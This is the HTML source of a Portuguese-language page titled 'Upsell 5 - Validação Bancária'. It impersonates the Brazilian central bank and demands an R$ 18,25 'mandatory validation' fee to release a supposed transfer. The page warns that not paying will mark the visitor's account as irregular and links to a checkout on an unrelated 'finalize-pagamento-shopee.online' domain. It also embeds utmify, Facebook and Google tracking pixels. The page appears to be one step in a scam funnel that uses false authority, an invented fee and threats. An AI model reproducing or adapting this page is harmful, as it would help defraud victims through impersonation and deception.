<!DOCTYPE html><html lang="pt-BR"><head>
    <meta charset="UTF-8">
  <script src="js/latest.js" data-utmify-prevent-xcod-sck="" data-utmify-prevent-subids="" async="" defer=""></script>
<script>
  window.pixelId = "6858368e6cdda20eebaaee9d";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>
<script>
  window.pixelId = "685c8d85a8418f59c1c0645b";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>

<!-- Facebook Pixel Code -->
<script>
  !function(f,b,e,v,n,t,s)
  {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
  n.callMethod.apply(n,arguments):n.queue.push(arguments)};
  if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
  n.queue=[];t=b.createElement(e);t.async=!0;
  t.src=v;s=b.getElementsByTagName(e)[0];
  s.parentNode.insertBefore(t,s)}(window, document,'script',
  'https://connect.facebook.net/en_US/fbevents.js');
  fbq('init', '{545588041738219}');
  fbq('track', 'PageView');
</script>
<noscript>
  <img height="1" width="1" style="display:none" 
       src="https://www.facebook.com/tr?id={545588041738219}&ev=PageView&noscript=1"/>
</noscript>
<!-- End Facebook Pixel Code -->

<!-- Google tag (gtag.js) -->
<script async="" src="https://www.googletagmanager.com/gtag/js?id=G-9KHLJC5JZB"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-9KHLJC5JZB');
</script>

    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Upsell 5 - Validação Bancária</title>
    <script src="../assets/js/links.js"></script>
        <script src="latest.html" data-utmify-prevent-xcod-sck="" data-utmify-prevent-subids="" async="" defer=""></script>
    <style>
        body {
            font-family: 'Arial', sans-serif;
            margin: 0;
            padding: 0;
            background-color: #f8f9fa;
            color: #333;
        }

        .header {
            background-color: #004080;
            padding: 20px;
            text-align: center;
        }

        .header img {
            max-width: 150px;
        }

        .container {
            max-width: 600px;
            margin: 40px auto;
            padding: 30px;
            background: #ffffff;
            box-shadow: 0 4px 12px rgba(0, 0, 0, 0.1);
            border-radius: 10px;
            text-align: center;
        }

        .container h1 {
            color: #004080;
            font-size: 26px;
            margin-bottom: 20px;
            font-weight: bold;
        }

        .container p {
            font-size: 16px;
            color: #555;
            line-height: 1.6;
            margin-bottom: 20px;
        }

        .highlight {
            color: #004080;
            font-weight: bold;
        }

        .cta {
            margin-top: 30px;
        }

        .cta button {
            background-color: #004080;
            color: white;
            padding: 15px 30px;
            border: none;
            font-size: 18px;
            font-weight: bold;
            border-radius: 5px;
            cursor: pointer;
            transition: background-color 0.3s;
        }

        .cta button:hover {
            background-color: #0056b3;
        }

        .footer {
            margin-top: 30px;
            font-size: 14px;
            color: #777;
        }

        .footer strong {
            color: #d9534f;
        }

        .info-box {
            background-color: #f1f1f1;
            border-left: 5px solid #004080;
            padding: 15px;
            margin: 20px 0;
            text-align: left;
            font-size: 15px;
            color: #333;
        }

        .info-box h3 {
            margin: 0;
            font-size: 16px;
            font-weight: bold;
        }
    </style>
</head>
<body>

    <div class="header">
        <img src="https://s3.typebot.io/public/workspaces/clpwrgv88001vlh0fl3wduaqz/typebots/clsoykmoc0001o1a8fuuy3j8r/blocks/ymggz8eopp0fj524hfxubuit?v=1735166818525" alt="Logo Banco Central">
    </div>

    <div class="container">
        <h1>🔒 Validação Bancária Obrigatória</h1>
        <p>Para garantir a segurança e regularidade da sua transferência, é necessária a realização de uma <span class="highlight">validação bancária obrigatória</span>, conforme as normas do sistema bancário nacional.</p>

        <div class="info-box">
            <h3>Por que a validação é necessária?</h3>
            <p>✔️ Evita transações inválidas ou bloqueios futuros.</p>
            <p>✔️ Confirma a autenticidade dos seus dados bancários.</p>
            <p>✔️ Libera sua transferência com total segurança.</p>
        </div>

        <p><strong>Valor da Taxa:</strong> <span class="highlight">R$ 18,25</span></p>
        <p><strong>Prazo para Validação:</strong> Até 15 minutos após o pagamento.</p>

        <div class="cta">
             <a href="https://pay.finalize-pagamento-shopee.online/checkout/4922031a-cfb8-4412-8dbd-a6dcd54b6fd3"><button onclick="">VALIDAR AGORA</button></a>
        </div>

        <div class="footer">
            ⚠️ <strong>Atenção:</strong> O não pagamento pode causar o registro de sua conta como <strong>irregular</strong>, impactando futuras transações financeiras.
        </div>
    </div>
    <script>function checkout(event){event.preventDefault();const currentParams=window.location.search;const destino="https://pay.finalize-pagamento-shopee.online/checkout/4922031a-cfb8-4412-8dbd-a6dcd54b6fd3"+currentParams;window.location.href=destino;}</script>
<script>window.pixelId="68104c52a3d905d3f8e3b553";var a=document.createElement("script");a.setAttribute("async","");a.setAttribute("defer","");a.setAttribute("src","../../../../cdn.utmify.com.br/scripts/pixel/pixel.js");document.head.appendChild(a);</script>

<script src="js/latest.js" data-utmify-prevent-xcod-sck="" data-utmify-prevent-subids="" async="" defer=""></script>

</body></html>